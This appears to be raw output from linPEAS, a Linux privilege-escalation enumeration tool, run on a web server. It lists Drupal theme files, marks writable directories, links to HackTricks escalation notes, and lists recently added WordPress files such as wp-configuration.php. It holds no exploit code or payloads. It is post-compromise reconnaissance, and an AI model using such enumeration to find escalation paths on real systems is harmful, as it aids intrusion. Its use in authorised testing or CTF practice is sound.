/srv/web/drupal-9.5.2/core/themes/seven/templates/text_format/container--text-format-filter-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/page.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/block--local-actions-block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/image-widget.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/maintenance-page.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/media-library
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/media-library/media-library-item.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/media-library/media--media-library.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/media-library/container--media-library-widget-selection.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/media-library/links--media-library-menu.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/media-library/media-library-wrapper.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/navigation
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/navigation/toolbar.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/navigation/menu.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/navigation/menu-local-task.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/navigation/book-all-books-block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/navigation/breadcrumb.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/layout
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/layout/html.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/layout/book-export-html.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/layout/region.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/form
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/form/datetime-form.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/form/fieldset.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/form/datetime-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/form/form-element-label.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/form/form-element.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/user
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/user/username.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/user/user.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/user/forum-submitted.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/dataset
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/dataset/forum-list.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/dataset/table.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/dataset/forums.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/dataset/aggregator-feed.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/dataset/forum-icon.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/block
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/block/block--system-menu-block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/block/block--system-branding-block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/block/block--search-form-block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/block/block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/block/block--local-tasks-block.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/views
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/views/views-view.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/views/views-view-grouping.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/views/views-view-summary.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/views/views-view-table.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/views/views-view-summary-unformatted.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content-edit
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content-edit/text-format-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content-edit/file-managed-file.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content-edit/filter-tips.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content-edit/filter-guidelines.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content-edit/filter-caption.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/field
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/field/field--node--uid.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/field/field--text.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/field/field--node--title.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/field/file-video.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/field/link-formatter-link-separate.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/misc
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/misc/help-section.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/misc/rdf-metadata.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/misc/status-messages.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/misc/progress-bar.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content/comment.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content/book-node-export-html.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content/media-embed-error.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content/aggregator-item.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/classy/content/mark.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/seven/templates/install-page.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/status-report-page.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/node-edit-form.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/block-content-add-list.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/field
/srv/web/drupal-9.5.2/core/themes/seven/templates/field/file-link.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/admin-block-content.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/details.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/status-report-counter.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/node-add-list.html.twig
/srv/web/drupal-9.5.2/core/themes/seven/templates/status-report-general-info.html.twig
/srv/web/drupal-9.5.2/core/themes/stark
/srv/web/drupal-9.5.2/core/themes/stark/config
/srv/web/drupal-9.5.2/core/themes/stark/config/schema
/srv/web/drupal-9.5.2/core/themes/stark/config/schema/stark.schema.yml
/srv/web/drupal-9.5.2/core/themes/stark/stark.info.yml
/srv/web/drupal-9.5.2/core/themes/stark/README.txt
/srv/web/drupal-9.5.2/core/themes/stark/stark.breakpoints.yml
/srv/web/drupal-9.5.2/core/themes/claro
/srv/web/drupal-9.5.2/core/themes/claro/config
/srv/web/drupal-9.5.2/core/themes/claro/config/optional
/srv/web/drupal-9.5.2/core/themes/claro/config/optional/block.block.claro_page_title.yml
/srv/web/drupal-9.5.2/core/themes/claro/config/optional/block.block.claro_help.yml
/srv/web/drupal-9.5.2/core/themes/claro/config/optional/block.block.claro_messages.yml
/srv/web/drupal-9.5.2/core/themes/claro/config/optional/block.block.claro_breadcrumbs.yml
/srv/web/drupal-9.5.2/core/themes/claro/config/optional/block.block.claro_primary_local_tasks.yml
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/config/schema
/srv/web/drupal-9.5.2/core/themes/claro/config/schema/claro.schema.yml
/srv/web/drupal-9.5.2/core/themes/claro/claro.libraries.yml
/srv/web/drupal-9.5.2/core/themes/claro/css
/srv/web/drupal-9.5.2/core/themes/claro/css/theme
/srv/web/drupal-9.5.2/core/themes/claro/css/theme/toolbar.theme.css
/srv/web/drupal-9.5.2/core/themes/claro/css/theme/field-ui.admin.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/theme/ckeditor.admin.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/theme/ckeditor-frame.css
/srv/web/drupal-9.5.2/core/themes/claro/css/theme/ckeditor-frame.pcss.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/css/layout
/srv/web/drupal-9.5.2/core/themes/claro/css/layout/local-actions.css
/srv/web/drupal-9.5.2/core/themes/claro/css/layout/card-list.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/layout/system-admin--layout.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/layout/card-list.css
/srv/web/drupal-9.5.2/core/themes/claro/css/layout/system-admin--layout.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/css/base
/srv/web/drupal-9.5.2/core/themes/claro/css/base/off-canvas.theme.css
/srv/web/drupal-9.5.2/core/themes/claro/css/base/off-canvas.theme.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/base/typography.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/base/elements.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/base/elements.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/css/classy
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/components
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/components/media-embed-error.css
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/components/forum.css
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/components/more-link.css
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/components/search-results.css
/srv/web/drupal-9.5.2/core/themes/claro/css/classy/components/inline-form.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/css/state
/srv/web/drupal-9.5.2/core/themes/claro/css/state/toolbar.menu.css
/srv/web/drupal-9.5.2/core/themes/claro/css/state/toolbar.menu.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components
/srv/web/drupal-9.5.2/core/themes/claro/css/components/tabledrag.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/system-admin--status-report.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/system-status-counter.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/quickedit.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/icon-link.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/css/components/jquery.ui/theme.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/jquery.ui/theme.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/form--password-confirm.pcss.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/system-admin--panel.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/file.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/form--password-confirm.css
/srv/web/drupal-9.5.2/core/themes/claro/css/components/media-library.ui.pcss.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/js
/srv/web/drupal-9.5.2/core/themes/claro/js/messages.js
/srv/web/drupal-9.5.2/core/themes/claro/js/autocomplete.es6.js
/srv/web/drupal-9.5.2/core/themes/claro/js/dropbutton.es6.js
/srv/web/drupal-9.5.2/core/themes/claro/js/nav-tabs.es6.js
/srv/web/drupal-9.5.2/core/themes/claro/js/ajax.es6.js
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/js/classy/media_embed_ckeditor.theme.es6.js
/srv/web/drupal-9.5.2/core/themes/claro/js/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/claro/js/classy/media_embed_ckeditor.theme.js
/srv/web/drupal-9.5.2/core/themes/claro/js/media-library.ui.es6.js
/srv/web/drupal-9.5.2/core/themes/claro/js/vertical-tabs.js
/srv/web/drupal-9.5.2/core/themes/claro/js/user.theme.js
/srv/web/drupal-9.5.2/core/themes/claro/js/responsive-details.es6.js
/srv/web/drupal-9.5.2/core/themes/claro/js/ajax.js
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/src
/srv/web/drupal-9.5.2/core/themes/claro/src/ClaroPreRender.php
/srv/web/drupal-9.5.2/core/themes/claro/claro.theme
/srv/web/drupal-9.5.2/core/themes/claro/claro.info.yml
/srv/web/drupal-9.5.2/core/themes/claro/images
/srv/web/drupal-9.5.2/core/themes/claro/images/core
/srv/web/drupal-9.5.2/core/themes/claro/images/core/73b355
/srv/web/drupal-9.5.2/core/themes/claro/images/core/e29700
/srv/web/drupal-9.5.2/core/themes/claro/images/core/e32700
/srv/web/drupal-9.5.2/core/themes/claro/images/core/README.md
/srv/web/drupal-9.5.2/core/themes/claro/images/core/333333
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/images/core/stable/views_ui
/srv/web/drupal-9.5.2/core/themes/claro/images/core/787878
/srv/web/drupal-9.5.2/core/themes/claro/images/core/ffffff
/srv/web/drupal-9.5.2/core/themes/claro/images/shortcut
/srv/web/drupal-9.5.2/core/themes/claro/images/classy
/srv/web/drupal-9.5.2/core/themes/claro/images/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/claro/images/classy/icons
/srv/web/drupal-9.5.2/core/themes/claro/images/icons
/srv/web/drupal-9.5.2/core/themes/claro/images/icons/currentColor
/srv/web/drupal-9.5.2/core/themes/claro/images/icons/e34f4f
/srv/web/drupal-9.5.2/core/themes/claro/images/icons/d3d4d9
/srv/web/drupal-9.5.2/core/themes/claro/images/icons/d72222
/srv/web/drupal-9.5.2/core/themes/claro/images/icons/003ecc
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/images/src
/srv/web/drupal-9.5.2/core/themes/claro/templates
/srv/web/drupal-9.5.2/core/themes/claro/templates/entity-add-list.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/admin
/srv/web/drupal-9.5.2/core/themes/claro/templates/admin/update-version.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/admin/admin-page.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/admin/system-modules-details.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/admin/config_translation_manage_form_element.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/admin/admin-block-content.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/menu-local-tasks.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/text-format-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/media-library
/srv/web/drupal-9.5.2/core/themes/claro/templates/media-library/views-view--media-library.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/media-library/media--media-library.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/media-library/fieldset--media-library-widget.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/media-library/item-list--media-library-add-form-media-list.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/media-library/views-view-unformatted--media-library.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/off-canvas-page-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/navigation
/srv/web/drupal-9.5.2/core/themes/claro/templates/navigation/toolbar.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/navigation/menu--toolbar.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/navigation/menu-local-task.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/navigation/menu-local-task--views-ui.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/navigation/details--vertical-tabs.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/status-report-grouped.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/text_format
/srv/web/drupal-9.5.2/core/themes/claro/templates/text_format/container--text-format-filter-help.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/text_format/container--text-format-filter-guidelines.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/text_format/container--text-format-filter-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form
/srv/web/drupal-9.5.2/core/themes/claro/templates/form/checkboxes.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form/input.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form/field-multiple-value-form.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form/radios.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form/textarea.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/page.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/block
/srv/web/drupal-9.5.2/core/themes/claro/templates/block/block--local-tasks-block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/datetime-form.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/fieldset.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/pager.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/block--local-actions-block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/region--breadcrumb.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/media-library
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/media-library/media-library-item.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/media-library/container--media-library-widget-selection.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/media-library/links--media-library-menu.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/media-library/media-library-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/media-library/container--media-library-content.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/navigation
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/navigation/toolbar.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/navigation/menu.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/navigation/book-all-books-block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/navigation/book-tree.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/navigation/book-navigation.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/layout
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/layout/html.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/layout/book-export-html.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/layout/region.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/user
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/user/username.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/user/user.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/user/forum-submitted.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/dataset
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/dataset/forum-list.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/dataset/table.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/dataset/forums.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/dataset/aggregator-feed.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/dataset/forum-icon.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/README.txt
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/block
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/block/block--system-menu-block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/block/block--system-branding-block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/block/block--search-form-block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/block/block.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/views
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/views/views-view.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/views/views-view-grouping.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/views/views-view-summary.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/views/views-view-table.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/views/views-view-summary-unformatted.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content-edit
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content-edit/filter-caption.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/field
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/field/field--node--uid.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/field/field--text.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/field/field--node--title.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/field/file-video.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/field/link-formatter-link-separate.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/misc
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/misc/help-section.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/misc/rdf-metadata.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/misc/progress-bar.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content/comment.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content/book-node-export-html.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content/media-embed-error.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content/aggregator-item.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/classy/content/mark.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/system-themes-page.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/views
/srv/web/drupal-9.5.2/core/themes/claro/templates/views/views-ui-expose-filter-form.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/views/views-mini-pager.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/views/views-ui-display-tab-bucket.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/views/views-ui-display-tab-setting.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/views/views-ui-view-preview-section--exposed.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/claro/templates/install-page.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/content-edit
/srv/web/drupal-9.5.2/core/themes/claro/templates/content-edit/file-widget-multiple.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/content-edit/file-managed-file.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/content-edit/image-widget.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/status-report-page.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/datetime-wrapper.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/node-edit-form.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/block-content-add-list.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/field
/srv/web/drupal-9.5.2/core/themes/claro/templates/field/file-link.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/breadcrumb.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form-element-label.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/misc
/srv/web/drupal-9.5.2/core/themes/claro/templates/misc/status-messages.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/details.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/status-report-counter.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/filter
/srv/web/drupal-9.5.2/core/themes/claro/templates/filter/filter-tips.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/filter/filter-guidelines.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/views-exposed-form.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/node-add-list.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/status-report-general-info.html.twig
/srv/web/drupal-9.5.2/core/themes/claro/templates/form-element.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css/components
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css/components/tabledrag.css
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css/components/user.css
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css/components/pager.css
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css/components/more-link.css
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/css/components/search-results.css
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/starterkit_theme/README.md
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/starterkit_theme.info.yml
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/src
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/src/StarterKit.php
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/starterkit_theme.theme
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/images
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/images/icons
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/starterkit_theme.libraries.yml
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/navigation
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/navigation/menu-local-tasks.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/navigation/vertical-tabs.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/navigation/menu.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/navigation/pager.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/navigation/menu-local-action.html.twig
#)You_can_write_even_more_files_inside_last_directory

/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/layout
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/layout/page.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/layout/maintenance-page.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/layout/html.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/layout/region.html.twig
/srv/web/drupal-9.5.2/core/themes/starterkit_theme/templates/form



                            ╔═════════════════════════╗
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
                            ╚═════════════════════════╝
╔══════════╣ .sh files in path
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#script-binaries-in-path
/usr/bin/gettext.sh

╔══════════╣ Executable files potentially added by user (limit 70)
2023-11-26+12:41:05.4954936320 /srv/web/sitelabo/wp-configuration.php
2023-11-26+12:36:21.4452946280 /srv/web/sitelabo/wp-content/themes/clean-education-child/functions.php
2023-11-26+12:36:21.4372945660 /srv/web/sitelabo/wp-content/themes/clean-education-child/style.css
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/single.php
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/readme.txt
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/no-thumb-480x320.jpg
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/no-thumb-320x480.jpg
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/no-thumb-240x240.jpg
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/no-thumb-1320x566.jpg
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/logo5.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/logo4.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/logo3.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/logo2.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/logo1.png
2023-11-26+12:26:12.4085796510 /srv/web/sitelabo/wp-content/themes/clean-education/images/jquery-ui/ui-icons_ffffff_256x240.png
